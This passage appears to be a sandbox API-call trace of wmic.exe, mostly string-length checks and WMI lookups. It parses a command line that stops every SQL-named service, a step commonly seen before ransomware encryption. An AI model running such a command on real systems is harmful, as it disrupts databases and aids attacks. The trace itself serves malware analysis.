(param_1="texttablewsys.xsl") returned 0x11 [0104.755] SysStringLen (param_1="XML") returned 0x3 [0104.755] SysStringLen (param_1="texttablewsys") returned 0xd [0104.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.755] SysStringLen (param_1="TABLE") returned 0x5 [0104.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.755] SysStringLen (param_1="XML") returned 0x3 [0104.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.755] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.755] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.755] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.756] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.756] SysStringLen (param_1="TABLE") returned 0x5 [0104.756] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.756] SysStringLen (param_1="XML") returned 0x3 [0104.756] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.756] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.756] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.756] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.756] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.756] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.756] SysStringLen (param_1="TABLE") returned 0x5 [0104.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.756] SysStringLen (param_1="XML") returned 0x3 [0104.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.756] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.756] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.756] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.756] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="TABLE") returned 0x5 [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="XML") returned 0x3 [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.757] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.757] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.757] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.757] SysStringLen (param_1="TABLE") returned 0x5 [0104.757] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.757] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.757] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.757] SysStringLen (param_1="XML") returned 0x3 [0104.757] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.757] SysStringLen (param_1="texttablewsys") returned 0xd [0104.757] SysStringLen (param_1="XML") returned 0x3 [0104.757] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="TABLE") returned 0x5 [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="XML") returned 0x3 [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="texttablewsys") returned 0xd [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.758] SysStringLen (param_1="XML") returned 0x3 [0104.758] SysStringLen (param_1="htable-sortby") returned 0xd [0104.758] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.758] SysStringLen (param_1="TABLE") returned 0x5 [0104.758] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.758] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.758] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.758] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.758] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.758] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.758] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.758] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="TABLE") returned 0x5 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.759] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.759] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.759] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="TABLE") returned 0x5 [0104.759] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.759] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.759] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.759] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.759] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] SysStringLen (param_1="TABLE") returned 0x5 [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.760] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.760] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.760] FreeThreadedDOMDocument:IUnknown:Release (This=0xff45a8) returned 0x0 [0104.760] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE" [0104.760] memcpy_s (in: _Destination=0x10c8040, _DestinationSize=0x7e, _Source=0xe41588, _SourceSize=0x76 | out: _Destination=0x10c8040) returned 0x0 [0104.760] GetLocalTime (in: lpSystemTime=0xc2fb24 | out: lpSystemTime=0xc2fb24*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x8, wSecond=0x39, wMilliseconds=0x26d)) [0104.761] _vsnwprintf (in: _Buffer=0x10c80c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xc2fb04 | out: _Buffer="04-15-2018T10:08:57") returned 19 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString="SERVICE") returned 7 [0104.761] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString="WHERE") returned 5 [0104.761] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0104.761] memmove_s (in: _Destination=0x10c2c78, _DestinationSize=0x4, _Source=0x10c2c68, _SourceSize=0x4 | out: _Destination=0x10c2c78) returned 0x0 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0104.761] _wcsicmp (_String1="'caption LIKE '%SQL%''", _String2="\"NULL\"") returned 5 [0104.761] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0104.761] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0104.761] memmove_s (in: _Destination=0x10c7c68, _DestinationSize=0x8, _Source=0x10c2c78, _SourceSize=0x8 | out: _Destination=0x10c7c68) returned 0x0 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString="CALL") returned 4 [0104.761] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0104.761] memmove_s (in: _Destination=0x10c7d10, _DestinationSize=0xc, _Source=0x10c7c68, _SourceSize=0xc | out: _Destination=0x10c7d10) returned 0x0 [0104.761] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE") returned 55 [0104.761] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.761] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0104.761] memmove_s (in: _Destination=0x10c2318, _DestinationSize=0x10, _Source=0x10c7d10, _SourceSize=0x10 | out: _Destination=0x10c2318) returned 0x0 [0104.761] lstrlenW (lpString="QUIT") returned 4 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0104.762] lstrlenW (lpString="EXIT") returned 4 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0104.762] WbemLocator:IUnknown:AddRef (This=0xe46d50) returned 0x2 [0104.762] lstrlenW (lpString="/") returned 1 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0104.762] lstrlenW (lpString="-") returned 1 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0104.762] lstrlenW (lpString="CLASS") returned 5 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0104.762] lstrlenW (lpString="PATH") returned 4 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0104.762] lstrlenW (lpString="CONTEXT") returned 7 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] lstrlenW (lpString="SERVICE") returned 7 [0104.762] GetCurrentThreadId () returned 0xc90 [0104.762] ??0CHString@@QAE@XZ () returned 0xc2fa78 [0104.762] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe46d50, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xe701d8) returned 0x0 [0104.783] CoSetProxyBlanket (pProxy=0xe701d8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0104.783] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.783] GetCurrentThreadId () returned 0xc90 [0104.783] ??0CHString@@QAE@XZ () returned 0xc2fa20 [0104.783] SysStringLen (param_1="root\\cli") returned 0x8 [0104.783] SysStringLen (param_1="\\") returned 0x1 [0104.783] SysStringLen (param_1="root\\cli\\") returned 0x9 [0104.784] SysStringLen (param_1="ms_409") returned 0x6 [0104.784] WbemLocator:IWbemLocator:ConnectServer (in: This=0xe46d50, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xe703b8) returned 0x0 [0104.790] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.790] GetCurrentThreadId () returned 0xc90 [0104.790] ??0CHString@@QAE@XZ () returned 0xc2fa7c [0104.790] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0104.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x10c89e8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0104.790] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0104.790] SysStringLen (param_1="SERVICE") returned 0x7 [0104.790] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0104.790] SysStringLen (param_1="'") returned 0x1 [0104.790] IWbemServices:GetObject (in: This=0xe701d8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xc2fa78*=0x0, ppCallResult=0x0 | out: ppObject=0xc2fa78*=0xe95588, ppCallResult=0x0) returned 0x0 [0104.796] IWbemClassObject:Get (in: This=0xe95588, wszName="Target", lFlags=0, pVal=0xc2fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2fa50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.796] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.796] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0104.796] IWbemClassObject:Get (in: This=0xe95588, wszName="PWhere", lFlags=0, pVal=0xc2fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2fa50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.796] lstrlenW (lpString="WHERE Name='#'") returned 14 [0104.796] lstrlenW (lpString="WHERE Name='#'") returned 14 [0104.796] IWbemClassObject:Get (in: This=0xe95588, wszName="Connection", lFlags=0, pVal=0xc2fa50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2fa50*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe95948, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.796] IUnknown:QueryInterface (in: This=0xe95948, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xc2fa6c | out: ppvObject=0xc2fa6c*=0xe95948) returned 0x0 [0104.796] GetCurrentThreadId () returned 0xc90 [0104.796] ??0CHString@@QAE@XZ () returned 0xc2f9ec [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="Namespace", lFlags=0, pVal=0xc2f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0104.797] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="Locale", lFlags=0, pVal=0xc2f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe76f2c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] lstrlenW (lpString="ms_409") returned 6 [0104.797] lstrlenW (lpString="ms_409") returned 6 [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="User", lFlags=0, pVal=0xc2f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe76f2c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="Password", lFlags=0, pVal=0xc2f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="Server", lFlags=0, pVal=0xc2f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] lstrlenW (lpString=".") returned 1 [0104.797] lstrlenW (lpString=".") returned 1 [0104.797] IWbemClassObject:Get (in: This=0xe95948, wszName="Authority", lFlags=0, pVal=0xc2f9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe76f2c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9d0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.797] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.797] IUnknown:Release (This=0xe95948) returned 0x1 [0104.797] GetCurrentThreadId () returned 0xc90 [0104.797] ??0CHString@@QAE@XZ () returned 0xc2f9dc [0104.797] IWbemClassObject:Get (in: This=0xe95588, wszName="__RELPATH", lFlags=0, pVal=0xc2f9c4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f9c4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.798] GetCurrentThreadId () returned 0xc90 [0104.798] ??0CHString@@QAE@XZ () returned 0xc2f958 [0104.798] ??0CHString@@QAE@PBG@Z () returned 0xc2f954 [0104.798] ??0CHString@@QAE@ABV0@@Z () returned 0xc2f8d4 [0104.798] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0104.798] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x10c89e8 [0104.798] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0104.798] ?Left@CHString@@QBE?AV1@H@Z () returned 0xc2f8cc [0104.798] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xc2f8d0 [0104.798] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xc2f954 [0104.798] ??1CHString@@QAE@XZ () returned 0x1 [0104.798] ??1CHString@@QAE@XZ () returned 0x1 [0104.798] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xc2f8c8 [0104.798] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xc2f8d4 [0104.798] ??1CHString@@QAE@XZ () returned 0x1 [0104.798] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x10c8a48 [0104.798] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0104.798] ?Left@CHString@@QBE?AV1@H@Z () returned 0xc2f8cc [0104.798] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xc2f8d0 [0104.798] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xc2f954 [0104.798] ??1CHString@@QAE@XZ () returned 0x1 [0104.798] ??1CHString@@QAE@XZ () returned 0x1 [0104.798] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xc2f8c8 [0104.798] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xc2f8d4 [0104.798] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.798] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0104.798] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.798] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0104.798] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0104.798] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0104.798] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0104.798] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0104.798] SysStringLen (param_1="\"") returned 0x1 [0104.799] IWbemServices:GetObject (in: This=0xe703b8, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xc2f964*=0x0, ppCallResult=0x0 | out: ppObject=0xc2f964*=0xe95d28, ppCallResult=0x0) returned 0x0 [0104.800] IWbemClassObject:Get (in: This=0xe95d28, wszName="Text", lFlags=0, pVal=0xc2f930*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xc2f930*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe7ea30*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xe776d0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0104.800] SafeArrayGetLBound (in: psa=0xe7ea30, nDim=0x1, plLbound=0xc2f940 | out: plLbound=0xc2f940) returned 0x0 [0104.800] SafeArrayGetUBound (in: psa=0xe7ea30, nDim=0x1, plUbound=0xc2f944 | out: plUbound=0xc2f944) returned 0x0 [0104.800] SafeArrayGetElement (in: psa=0xe7ea30, rgIndices=0xc2f95c, pv=0xc2f948 | out: pv=0xc2f948) returned 0x0 [0104.801] SysStringLen (param_1="Service application management. ") returned 0x20 [0104.801] IUnknown:Release (This=0xe95d28) returned 0x0 [0104.801] ??1CHString@@QAE@XZ () returned 0x1 [0104.801] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.801] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.801] lstrlenW (lpString="Service application management. ") returned 32 [0104.801] lstrlenW (lpString="Service application management. ") returned 32 [0104.801] IUnknown:Release (This=0xe95588) returned 0x0 [0104.801] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.801] lstrlenW (lpString="PATH") returned 4 [0104.801] lstrlenW (lpString="WHERE") returned 5 [0104.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0104.802] lstrlenW (lpString="WHERE") returned 5 [0104.802] lstrlenW (lpString="WHERE") returned 5 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0104.802] lstrlenW (lpString="/") returned 1 [0104.802] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SQL%'", cchCount1=20, lpString2="/", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="-") returned 1 [0104.802] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SQL%'", cchCount1=20, lpString2="-", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0104.802] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0104.802] lstrlenW (lpString="/") returned 1 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="-") returned 1 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] lstrlenW (lpString="GET") returned 3 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0104.802] lstrlenW (lpString="LIST") returned 4 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0104.802] lstrlenW (lpString="SET") returned 3 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0104.802] lstrlenW (lpString="CREATE") returned 6 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] lstrlenW (lpString="CALL") returned 4 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0104.802] lstrlenW (lpString="/") returned 1 [0104.802] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="-") returned 1 [0104.802] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0104.802] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.802] lstrlenW (lpString="STOPSERVICE") returned 11 [0104.802] GetCurrentThreadId () returned 0xc90 [0104.802] ??0CHString@@QAE@XZ () 